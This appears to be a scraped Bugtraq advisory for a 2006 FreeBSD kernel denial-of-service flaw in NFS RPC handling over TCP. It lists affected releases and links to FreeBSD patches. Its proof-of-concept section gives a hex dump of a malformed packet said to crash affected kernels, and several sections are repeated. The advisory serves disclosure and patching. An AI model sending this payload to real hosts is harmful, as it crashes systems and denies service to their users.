FreeBSD Remote NFS RPC Request Denial of Service Vulnerability
BID:16838
Info
FreeBSD Remote NFS RPC Request Denial of Service Vulnerability
| Bugtraq ID: | 16838 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: |
CVE-2006-0900 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 27 2006 12:00AM |
| Updated: | Mar 04 2006 04:16AM |
| Credit: | Evgeny Legerov discovered this issue. |
| Vulnerable: |
FreeBSD FreeBSD 6.0 -STABLE FreeBSD FreeBSD 6.0 -RELEASE FreeBSD FreeBSD 5.4 -RELENG FreeBSD FreeBSD 5.4 -RELEASE FreeBSD FreeBSD 5.4 -PRERELEASE FreeBSD FreeBSD 5.3 -STABLE FreeBSD FreeBSD 5.3 -RELENG FreeBSD FreeBSD 5.3 -RELEASE FreeBSD FreeBSD 5.3 FreeBSD FreeBSD 4.11 -STABLE FreeBSD FreeBSD 4.11 -RELENG FreeBSD FreeBSD 4.11 -RELEASE-p3 FreeBSD FreeBSD 4.10 -RELENG FreeBSD FreeBSD 4.10 -RELEASE-p8 FreeBSD FreeBSD 4.10 -RELEASE FreeBSD FreeBSD 4.10 FreeBSD FreeBSD 5.4-STABLE FreeBSD FreeBSD 4.10-PRERELEASE |
| Not Vulnerable: | |
Discussion
FreeBSD Remote NFS RPC Request Denial of Service Vulnerability
FreeBSD is susceptible to a remote denial-of-service vulnerability. This issue is due to a flaw in affected versions of the kernel that potentially results in a crash when handling malformed RPC messages through TCP.
This issue allows remote attackers to cause affected systems to crash, denying further network service to legitimate users.
FreeBSD is susceptible to a remote denial-of-service vulnerability. This issue is due to a flaw in affected versions of the kernel that potentially results in a crash when handling malformed RPC messages through TCP.
This issue allows remote attackers to cause affected systems to crash, denying further network service to legitimate users.
Exploit / POC
FreeBSD Remote NFS RPC Request Denial of Service Vulnerability
This issue was discovered by the ProtoVer NFS testsuite 1.0 package, and can be reproduced by it.
The following packet data hex dump is sufficient to crash an affected kernel:
80 00 00 00 00 00 00 01 00 00 00 00 00 00 00 02
00 01 86 a5 00 00 00 01 00 00 00 01 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04
2f 74 6d 70
This issue was discovered by the ProtoVer NFS testsuite 1.0 package, and can be reproduced by it.
The following packet data hex dump is sufficient to crash an affected kernel:
80 00 00 00 00 00 00 01 00 00 00 00 00 00 00 02
00 01 86 a5 00 00 00 01 00 00 00 01 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04
2f 74 6d 70
Solution / Fix
FreeBSD Remote NFS RPC Request Denial of Service Vulnerability
Solution:
FreeBSD has released advisory FreeBSD-SA-06:10.nfs including fixes to address this issue. Please see the referenced advisory for more information.
FreeBSD FreeBSD 5.4-STABLE
FreeBSD FreeBSD 4.10 -RELENG
FreeBSD FreeBSD 4.10 -RELEASE-p8
FreeBSD FreeBSD 4.10
FreeBSD FreeBSD 4.10 -RELEASE
FreeBSD FreeBSD 4.11 -RELEASE-p3
FreeBSD FreeBSD 4.11 -RELENG
FreeBSD FreeBSD 4.11 -STABLE
FreeBSD FreeBSD 5.3 -RELEASE
FreeBSD FreeBSD 5.3 -RELENG
FreeBSD FreeBSD 5.3
FreeBSD FreeBSD 5.3 -STABLE
FreeBSD FreeBSD 5.4 -PRERELEASE
FreeBSD FreeBSD 5.4 -RELEASE
FreeBSD FreeBSD 5.4 -RELENG
FreeBSD FreeBSD 6.0 -RELEASE
FreeBSD FreeBSD 6.0 -STABLE
Solution:
FreeBSD has released advisory FreeBSD-SA-06:10.nfs including fixes to address this issue. Please see the referenced advisory for more information.
FreeBSD FreeBSD 5.4-STABLE
-
FreeBSD nfs.patch
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:10/nfs.patch
FreeBSD FreeBSD 4.10 -RELENG
-
FreeBSD nfs4.patch
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:10/nfs4.patch
FreeBSD FreeBSD 4.10 -RELEASE-p8
-
FreeBSD nfs4.patch
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:10/nfs4.patch
FreeBSD FreeBSD 4.10
-
FreeBSD nfs4.patch
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:10/nfs4.patch
FreeBSD FreeBSD 4.10 -RELEASE
-
FreeBSD nfs4.patch
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:10/nfs4.patch
FreeBSD FreeBSD 4.11 -RELEASE-p3
-
FreeBSD nfs4.patch
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:10/nfs4.patch
FreeBSD FreeBSD 4.11 -RELENG
-
FreeBSD nfs4.patch
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:10/nfs4.patch
FreeBSD FreeBSD 4.11 -STABLE
-
FreeBSD nfs4.patch
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:10/nfs4.patch
FreeBSD FreeBSD 5.3 -RELEASE
-
FreeBSD nfs.patch
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:10/nfs.patch
FreeBSD FreeBSD 5.3 -RELENG
-
FreeBSD nfs.patch
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:10/nfs.patch
FreeBSD FreeBSD 5.3
-
FreeBSD nfs.patch
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:10/nfs.patch
FreeBSD FreeBSD 5.3 -STABLE
-
FreeBSD nfs.patch
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:10/nfs.patch
FreeBSD FreeBSD 5.4 -PRERELEASE
-
FreeBSD nfs.patch
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:10/nfs.patch
FreeBSD FreeBSD 5.4 -RELEASE
-
FreeBSD nfs.patch
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:10/nfs.patch
FreeBSD FreeBSD 5.4 -RELENG
-
FreeBSD nfs.patch
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:10/nfs.patch
FreeBSD FreeBSD 6.0 -RELEASE
-
FreeBSD nfs.patch
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:10/nfs.patch
FreeBSD FreeBSD 6.0 -STABLE
-
FreeBSD nfs.patch
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-06:10/nfs.patch
References
FreeBSD Remote NFS RPC Request Denial of Service Vulnerability
References:
References:
- [Dailydave] fun with FreeBSD kernel (Evgeny Legerov)
- FreeBSD Homepage (FreeBSD)
- FreeBSD Security Information (FreeBSD)